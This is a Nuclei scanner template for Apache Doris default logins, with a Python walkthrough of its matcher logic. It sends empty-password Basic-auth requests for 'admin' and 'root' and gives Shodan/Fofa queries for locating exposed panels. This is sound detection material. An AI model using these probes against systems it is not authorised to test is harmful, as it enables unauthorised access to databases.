Vulnerability description
Tests whether the Apache Doris web panel (Doris is an easy-to-use, high-performance, unified analytics database) still accepts the default credentials on the root/admin user accounts, i.e. whether those accounts can be logged into with an empty password.
```yaml
id: doris-default-login

info:
  name: Apache Doris - Default Login
  author: icarot
  severity: high
  description: |
    Tests whether the Apache Doris panel, an easy-to-use, high-performance, unified analytics database, is using the default password on the root/admin user accounts.
  metadata:
    verified: true
    max-request: 2
    vendor: apache
    product: doris
    shodan-query: http.favicon.hash:"24048806"
    fofa-query: icon_hash=24048806
  tags: apache,default-login,doris,vuln

http:
  - raw:
      - |
        POST /rest/v1/login HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{basicAuth}}
        Content-Type: application/json; charset=utf-8

    # Each value is the base64 form of "user:" with an empty password:
    # YWRtaW46 decodes to "admin:", cm9vdDo= decodes to "root:".
    payloads:
      basicAuth:
        - YWRtaW46
        - cm9vdDo=
    stop-at-first-match: true

    # All three matchers must hit on the same response for a finding.
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'msg":"Login success!"'

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 490a0046304402206798965e4eb020b40b0391ddf2559221c70c163292a65b57e6c8a2103d42769402200a3f3fcdad3c5cce62ad1fa578d445bf2fc47c67690a1df7aaa2db044e2f5562:922c64590222798bb761d5b6d8e72950
```
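The following added example (not part of the template above or of the Nuclei project) shows what the template actually decides: it decodes the two `basicAuth` payloads to make the tested credentials explicit, then re-implements the three matchers under `matchers-condition: and` and the `stop-at-first-match` walk over the payload list. The HTTP responses are constructed inline to exercise the match and non-match paths; the exact JSON that a real Doris instance returns is not asserted here, only that the body matcher is a substring test on the literal `msg":"Login success!"` (note: no space after the colon). A defender can feed it responses captured from their own instance to confirm a hardening change took effect.

```python
import base64
from dataclasses import dataclass

# Credential payloads exactly as listed in the template's basicAuth list.
TEMPLATE_PAYLOADS = ["YWRtaW46", "cm9vdDo="]

# The three matcher values from the template.
BODY_WORD = 'msg":"Login success!"'
CONTENT_TYPE_WORD = "application/json"
EXPECTED_STATUS = 200


@dataclass
class HttpResponse:
    """Minimal stand-in for the response Nuclei evaluates (constructed for this example)."""
    status: int
    headers: dict
    body: str

    def content_type(self) -> str:
        return self.headers.get("Content-Type", "")


def decode_basic_auth(token: str) -> tuple:
    """Decode a Basic-auth token into (user, password); an empty password is the default-login case."""
    raw = base64.b64decode(token).decode("utf-8")
    user, _, password = raw.partition(":")
    return user, password


def template_matches(resp: HttpResponse) -> bool:
    """Apply the template's three matchers joined with matchers-condition: and."""
    body_ok = BODY_WORD in resp.body                      # type: word, part: body
    ctype_ok = CONTENT_TYPE_WORD in resp.content_type()   # type: word, part: content_type
    status_ok = resp.status == EXPECTED_STATUS            # type: status
    return body_ok and ctype_ok and status_ok


def evaluate(responses: dict) -> dict:
    """Walk the payloads in template order and stop at the first matching response.

    `responses` maps a basicAuth token to the HttpResponse observed for that request
    (a token with no recorded response is skipped, as Nuclei would have nothing to match).
    """
    for token in TEMPLATE_PAYLOADS:
        resp = responses.get(token)
        if resp is not None and template_matches(resp):
            user, password = decode_basic_auth(token)
            return {"matched": True, "user": user, "empty_password": password == ""}
    return {"matched": False}


# Constructed sample responses (not captured from a real Doris instance).
JSON_HEADERS = {"Content-Type": "application/json; charset=utf-8"}

# Admin login rejected with a JSON 200: body matcher fails, so "and" fails.
ADMIN_REJECTED = HttpResponse(200, JSON_HEADERS, '{"msg":"Login failed!","code":401,"data":null}')
# Root login accepted: all three matchers hit -> finding.
ROOT_ACCEPTED = HttpResponse(200, JSON_HEADERS, '{"msg":"Login success!","code":0,"data":{"user":"root"}}')
# Hardened instance: both attempts rejected.
ROOT_REJECTED = HttpResponse(200, JSON_HEADERS, '{"msg":"Login failed!","code":401,"data":null}')
# A "success" body that is not JSON and not 200 must not count either.
HTML_SUCCESS_PAGE = HttpResponse(302, {"Content-Type": "text/html"}, 'msg":"Login success!"')

VULNERABLE_SCAN = {"YWRtaW46": ADMIN_REJECTED, "cm9vdDo=": ROOT_ACCEPTED}
HARDENED_SCAN = {"YWRtaW46": ADMIN_REJECTED, "cm9vdDo=": ROOT_REJECTED}
ODD_SCAN = {"YWRtaW46": HTML_SUCCESS_PAGE, "cm9vdDo=": HTML_SUCCESS_PAGE}

if __name__ == "__main__":
    for token in TEMPLATE_PAYLOADS:
        print(token, "->", decode_basic_auth(token))
    print("vulnerable:", evaluate(VULNERABLE_SCAN))
    print("hardened:", evaluate(HARDENED_SCAN))
    print("non-json/non-200:", evaluate(ODD_SCAN))
```

The `ODD_SCAN` case is why the template uses `matchers-condition: and`: a body that happens to contain the success string is only reported when it also comes back as `application/json` with status 200, which cuts down false positives from redirects or error pages.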